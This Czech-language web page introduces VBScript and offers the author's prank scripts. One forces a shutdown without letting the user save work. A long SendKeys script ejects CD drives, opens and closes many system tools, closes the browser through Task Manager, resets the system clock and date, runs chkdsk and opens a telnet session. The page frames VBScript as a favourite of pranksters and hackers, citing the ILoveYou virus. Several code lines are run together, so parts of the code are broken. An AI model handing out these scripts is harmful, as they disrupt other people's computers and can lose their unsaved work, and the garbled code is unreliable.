VBScript je skriptovací jazyk Microsoft Visual Basic Scripting Edition určený pro vkládání kódu do webových stránek a běžné skriptování ve WSH (Interpreter skriptů nazývaný Windows Scripting Host), založený na jazyce Visual Basic. Tento jazyk je prý odpovědí na vytvoření jazyka javascript.

Tento jazyk je velice oblíbený pro vtípkaře či hackery. Vzpomeňme si třeba na vir ILoveYou. Výhoda spočívala v tom, že tento soubor byl malý, šel odeslat mailem a nevypadal podezřele. Script jde spouštět ve všech verzích Windows (včetně Win 7). Mám zde uvedeno několik malých aplikací, které jsem napsal. Postupem času je budu doplňovat.

Pro vytvoření spustitelného .vbs stačí otevřít notepad (poznámkový blok) a do něj tento text zkopírovat či napsat vlastní. Poté zvolte soubor → uložit jako a zvolit možnost – tuším – bez kódování, prostý text, prostě něco v tom smyslu (zmizí .txt za názvem). Nyní doplňte název s příponou. vbs a uložte. Takže například ahoj.vbs. Najděte soubor v místě uložení a otevřete ho.


Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("%windir%\system32\shutdown.exe", 1)

Tohle by mělo vypnout PC a uživatel si ani nestačí uložit rozdělanou práci.


Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run "notepad", 9

WScript.Sleep 500 ' Give Notepad some time to load

For i = 1 To 1000

  WshShell.SendKeys "Hello World!"

  WshShell.SendKeys "{ENTER}"next

Otevře notepad a za čas 500 vypíše 1000× Hello World!


Set wshshell = wscript.CreateObject("WScript.Shell")

Wshshell.run "wordpad"

wscript.sleep 400

wshshell.sendkeys "A"

wscript.sleep 100

wshshell.sendkeys "h"

wscript.sleep 120

wshshell.sendkeys "o"

wscript.sleep 200

wshshell.sendkeys "j"

wscript.sleep 140

wshshell.sendkeys " "

wscript.sleep 140

wshshell.sendkeys "j"

wscript.sleep 140

wshshell.sendkeys "m"

wscript.sleep 140

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 170

wshshell.sendkeys "u"

wscript.sleep 200

wshshell.sendkeys "j"

wscript.sleep 100

wshshell.sendkeys "i"

wscript.sleep 700

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 170

wshshell.sendkeys "u"

wscript.sleep 200

wshshell.sendkeys "j"

wscript.sleep 100

wshshell.sendkeys "i"

wscript.sleep 350

wshshell.sendkeys " "

wscript.sleep 120

wshshell.sendkeys "s"

wscript.sleep 140

wshshell.sendkeys "e"

wscript.sleep 140

wshshell.sendkeys " "

wscript.sleep 600

wshshell.sendkeys "H"

wscript.sleep 120

wshshell.sendkeys "u"

wscript.sleep 120

wshshell.sendkeys "b"

wscript.sleep 120

wshshell.sendkeys "e"

wscript.sleep 160

wshshell.sendkeys "r"

wscript.sleep 600

wshshell.sendkeys "t"

wscript.sleep 600

wshshell.sendkeys "."

wshshell.sendkeys "{ENTER}"

wscript.sleep 200

wshshell.sendkeys "K"

wscript.sleep 100

wshshell.sendkeys "e"

wscript.sleep 100

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys "t"

wscript.sleep 120

wshshell.sendkeys "v"

wscript.sleep 120

wshshell.sendkeys "e"

wscript.sleep 120

wshshell.sendkeys " "

wscript.sleep 100

wshshell.sendkeys "s"

wscript.sleep 110

wshshell.sendkeys "m"

wscript.sleep 110

wshshell.sendkeys "u"

wscript.sleep 110

wshshell.sendkeys "l"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 110

wshshell.sendkeys " "

wscript.sleep 310

wshshell.sendkeys "m"

wscript.sleep 200

wshshell.sendkeys "a"

wscript.sleep 200

wshshell.sendkeys "m"

wscript.sleep 200

wshshell.sendkeys "a"

wscript.sleep 400

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys "d"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys "s"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys "d"

wscript.sleep 200

wshshell.sendkeys "o"

wscript.sleep 200

wshshell.sendkeys "b"

wscript.sleep 200

wshshell.sendkeys "r"

wscript.sleep 200

wshshell.sendkeys "y"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 540

wshshell.sendkeys "d"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 200

wshshell.sendkeys "."

wscript.sleep 200

wshshell.sendkeys "{ENTER}"

wscript.sleep 200

wshshell.sendkeys "A"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys "c"

wscript.sleep 200

wshshell.sendkeys "h"

wshshell.sendkeys "a"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "h"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "c"

wscript.sleep 200

wscript.sleep 200

wshshell.sendkeys "i"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys "s"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys "p"

wscript.sleep 200

wshshell.sendkeys "o"

wscript.sleep 200

wshshell.sendkeys "b"

wscript.sleep 200

wshshell.sendkeys "a"

wscript.sleep 200

wshshell.sendkeys "v"

wscript.sleep 200

wshshell.sendkeys "i"

wscript.sleep 200

wshshell.sendkeys "t"

wscript.sleep 200

wshshell.sendkeys "!"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 200

wshshell.sendkeys ":"

wscript.sleep 200

wshshell.sendkeys "-"

wscript.sleep 200

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "{~}"

wscript.sleep 300

wshshell.sendkeys "+{}}"

wscript.sleep 300

wshshell.sendkeys "{BACKSPACE}"

wscript.sleep 200

wshshell.sendkeys "{}}"

wscript.sleep 200

wshshell.sendkeys " "

wscript.sleep 320

wshshell.sendkeys "{ENTER}"

wscript.sleep 200

wshshell.sendkeys "T"

wscript.sleep 140

wshshell.sendkeys "a"

wscript.sleep 100

wshshell.sendkeys "k"

wscript.sleep 100

wshshell.sendkeys " "

wscript.sleep 310

wshshell.sendkeys "t"

wscript.sleep 150

wshshell.sendkeys "e"

wscript.sleep 170

wshshell.sendkeys "d"

wscript.sleep 200

wshshell.sendkeys "y"

wscript.sleep 250

wshshell.sendkeys " "

wscript.sleep 50

wshshell.sendkeys "z"

wscript.sleep 120

wshshell.sendkeys "a"

wscript.sleep 160

wshshell.sendkeys "c"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 100

wshshell.sendkeys "e"

wscript.sleep 100

wshshell.sendkeys "m"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 120

wshshell.sendkeys "?"

wscript.sleep 120

wshshell.sendkeys "{ENTER}"

wscript.sleep 200

wshshell.sendkeys "x"

wscript.sleep 120

wshshell.sendkeys "D"

wscript.sleep 120

MsgBox "Tak smele do toho! He he he :-)"

wscript.sleep 10Set ovladani = CreateObject("WMPlayer.OCX.7" )

Set mechaniky = ovladani.cdromCollection

If mechaniky.Count Then

For i = 0 To mechaniky.Count - 1

mechaniky.Item(i).Eject

mechaniky.Item(i).Eject

NextMsgBox "Tak a jedeme dal"Set WshShell = WScript.CreateObject("WScript.Shell")

intReturn = WshShell.Run("notepad " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Notepad is now closed."

Set WshShell = WScript.CreateObject("WScript.Shell")

intReturn = WshShell.Run("calc " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Calculator is now closed."

Set WshShell = WScript.CreateObject("WScript.Shell")

intReturn = WshShell.Run("magnify " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Magnify is now closed."

Set WshShell = WScript.CreateObject("WScript.Shell")

intReturn = WshShell.Run("msconfig " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "System Configuration Utility  is now closed."

Set WshShell = WScript.CreateObject("WScript.Shell")

intReturn = WshShell.Run("cmd " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Cmd is now closed."

Set WshShell = WScript.CreateObject("WScript.Shell")

intReturn = WshShell.Run("wordpad " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Wordpad is now closed."

intReturn = WshShell.Run("mshearts " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Hearts are now closed."

intReturn = WshShell.Run("msinfo32 " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "System Information applet is now closed."

intReturn = WshShell.Run("mspaint " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Mspaint is now closed."

intReturn = WshShell.Run("regedit " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Registry editor  is now closed."

intReturn = WshShell.Run("sol " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Solitaire is now closed."

intReturn = WshShell.Run("dfrg.msc " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Disc defragmenter is now closed."

intReturn = WshShell.Run("diskmgmt.msc " & WScript.ScriptFullName, 1, TRUE)

WshShell.Popup "Disk Management is now closed."MsgBox "ted se poradne rozjedu, OK? :-)"

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("http://opicakuz.hu.cz/c.jpg", 1)

wscript.sleep 5000

wshshell.sendkeys "{TAB}"

wscript.sleep 10

wshshell.sendkeys "o"

wscript.sleep 10

wshshell.sendkeys "p"

wscript.sleep 10

wshshell.sendkeys "i"

wscript.sleep 10

wshshell.sendkeys "c"

wscript.sleep 10

wshshell.sendkeys "a"

wscript.sleep 10

wshshell.sendkeys "k"

wscript.sleep 10

wshshell.sendkeys "u"

wscript.sleep 10

wshshell.sendkeys "z"

wscript.sleep 10

wshshell.sendkeys "."

wscript.sleep 10

wshshell.sendkeys "h"

wscript.sleep 10wshshell.sendkeys "u"

wscript.sleep 10

wshshell.sendkeys "."

wscript.sleep 10

wshshell.sendkeys "c"

wscript.sleep 10

wshshell.sendkeys "z"

wscript.sleep 10

wshshell.sendkeys "/"

wscript.sleep 10

wshshell.sendkeys "c"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "n"

wscript.sleep 10

wshshell.sendkeys "a"

wscript.sleep 10

wshshell.sendkeys "+-"

wscript.sleep 10

wshshell.sendkeys "d"

wscript.sleep 10

wshshell.sendkeys "i"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "a"

wscript.sleep 10

wshshell.sendkeys "."

wscript.sleep 10

wshshell.sendkeys "h"

wscript.sleep 10

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "m"

wscript.sleep 10

wshshell.sendkeys "l"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 7000

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("taskmgr", 1)

wscript.sleep 300

wshshell.Sendkeys"{DEL}"

wscript.sleep 100

wshshell.sendkeys "{TAB}"

wscript.sleep 600

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("www.opicakuz.hu.cz/cerna_dira.html", 1)

wscript.sleep 7000

wshshell.Sendkeys("%^+{DEL}")

wscript.sleep 400

wshshell.Sendkeys"{TAB}"

wscript.sleep 1

wshshell.Sendkeys"{TAB}"

wscript.sleep 1

wshshell.Sendkeys"{TAB}"

wscript.sleep 1

wshshell.Sendkeys"{left}"

wscript.sleep 1

wshshell.Sendkeys"{left}"

wscript.sleep 1

wshshell.Sendkeys"{left}"

wscript.sleep 1

wshshell.Sendkeys"{left}"

wscript.sleep 1

wshshell.Sendkeys"{left}"

wscript.sleep 1

wshshell.Sendkeys"{left}"

wscript.sleep 1

wshshell.sendkeys "{DEL}"

wscript.sleep 200

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

MsgBox "A ted hudbicku!"Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("C:\WINDOWS\system32\oobe\images\title.wma", 1)wscript.sleep 200

MsgBox "K hudbicce svetelka (koukni se na CAPSLOOK)"wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 500

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 500

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 500

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 500

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 500

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 200

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{SCROLLLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{CAPSLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wscript.sleep 300

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{CAPSLOCK}"

wshshell.sendkeys "{NUMLOCK}"

wshshell.sendkeys "{SCROLLLOCK}"MsgBox "A nakonec film"Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("http://opicakuz.hu.cz/", 7)

wscript.sleep 2000

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)wscript.sleep 1

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)

wscript.sleep 1

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)

wscript.sleep 100

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)

wscript.sleep 1

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)

wscript.sleep 200

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)

wscript.sleep 1

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("compact", 3)

wscript.sleep 1

Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("cmd", 1)

wscript.sleep 100

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 2000

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "time"

wscript.sleep 100

wshshell.sendkeys "{ENTER}"

wscript.sleep 100

wshshell.sendkeys "00:00:00,01"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "date"

wscript.sleep 100

wshshell.sendkeys "{ENTER}"

wscript.sleep 100

wshshell.sendkeys "21.12.2012"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "d"

wscript.sleep 10

wshshell.sendkeys "i"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 2000

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "exit"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("cmd", 1)wscript.sleep 500

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 2000

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "time"

wscript.sleep 100

wshshell.sendkeys "{ENTER}"

wscript.sleep 100

wshshell.sendkeys "00:00:00,01"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "date"

wscript.sleep 100

wshshell.sendkeys "{ENTER}"

wscript.sleep 100

wshshell.sendkeys "21.12.2012"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "color 3"

wscript.sleep 10

wshshell.sendkeys "color 1"

wscript.sleep 10

wshshell.sendkeys "color 2"

wscript.sleep 10

wshshell.sendkeys "color 4"

wscript.sleep 10

wshshell.sendkeys "color 5"

wscript.sleep 10

wshshell.sendkeys "color 7"

wscript.sleep 10

wshshell.sendkeys "color 6"

wscript.sleep 10

wshshell.sendkeys "color 8"

wscript.sleep 10

wshshell.sendkeys "color 9"

wscript.sleep 10

wshshell.sendkeys "color A"

wscript.sleep 10

wshshell.sendkeys "color B"

wscript.sleep 10

wshshell.sendkeys "color C"

wscript.sleep 10

wshshell.sendkeys "color D"

wscript.sleep 10

wshshell.sendkeys "color E"

wscript.sleep 10

wshshell.sendkeys "color F"

wscript.sleep 10

wshshell.sendkeys "color 20"

wscript.sleep 10

wshshell.sendkeys "prompt Hello World!"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 1000wshshell.sendkeys "chk"

wscript.sleep 500

wshshell.sendkeys "dsk"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 100000Set WshShell = WScript.CreateObject("WScript.Shell")

Return = WshShell.Run("cmd", 1)

wshshell.sendkeys "attrib"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "attrib"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "attrib"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "attrib"

wscript.sleep 10wshshell.sendkeys "d"

wscript.sleep 10

wshshell.sendkeys "i"

wscript.sleep 10

wshshell.sendkeys "r"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 2000

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "dir"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 10

wshshell.sendkeys "tree"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 100wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}"

wscript.sleep 1

wshshell.sendkeys "{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}{ENTER}"

wscript.sleep 1

wscript.sleep 500

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "l"

wscript.sleep 10

wshshell.sendkeys "n"

wscript.sleep 10

wshshell.sendkeys "e"

wscript.sleep 10

wshshell.sendkeys "t"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 200

wshshell.sendkeys "o"

wscript.sleep 10

wshshell.sendkeys "{ENTER}"

wscript.sleep 200

wshshell.sendkeys "t"

wscript.sleep 200

wshshell.sendkeys "o"

wscript.sleep 200

wshshell.sendkeys "w"

wscript.sleep 200

wshshell.sendkeys "e"

wscript.sleep 200

wshshell.sendkeys "l"

wscript.sleep 200

wshshell.sendkeys "."

wscript.sleep 200

wshshell.sendkeys "b"

wscript.sleep 200

wshshell.sendkeys "l"

wscript.sleep 200

wshshell.sendkeys "i"

wscript.sleep 200

wshshell.sendkeys "n"

wscript.sleep 200

wshshell.sendkeys "k"

wscript.sleep 200

wshshell.sendkeys "enlights.nl"wshshell.sendkeys "{ENTER}"

wscript.sleep 200

MsgBox "Pokud chces videt IV epizodu Star Wars, tak, jak by vypadala v DOSu, setrvej cca jednu minutu. Je to fakt narez. Hlavne R2D2 !(O_o)!"wshshell.sendkeys "{ENTER}"

wscript.sleep 100

end if

- Nejdříve se otevře Word a začne se psát text pomocí SendKeys. Je to vlastně simulace stisknutých kláves.
- Poté se zobrazí zpráva, kterou je nutné potvrdit pomocí klávesy enter
- 2× se vysune a zasune CD mechanika
- Zavře se notepad
- Spustí se a následně se znovu zavře asi 20 aplikací
- Otevře se webová stránka s obrázkem ztraceného připojení k internetu
- Tabem se překlikne do panelu adresa a vypíše se odkaz na černou díru
- Po chvíli se spustí správce úloh (ctrl + alt + delete) a pokud má uživatel nastavenou záložku aplikace (většinou má), zavře prohlížeč
- Spustí hudební soubor, jenž se uložen ve složce Windows. Má ho tedy každý uživatel (tedy WIndows XP, ostatní nevím).
- K hudbě začne střídavě blikat Numlock, CapsLock, ScrollLock
- Spustí se příkazový řádek a začne se vypisovat příkaz tree a dir
- Také se zde změní systémový čas a datum
- Příkazový řádek začne měnit barvy
- CMD zkontroluje disk
- Začne se vypisovat enter
- Pomocí telnetu spustí Star Wars – DOS verzi (dlouho se čeká na spuštění)
- Vypíše hlášku, aby člověk čekal

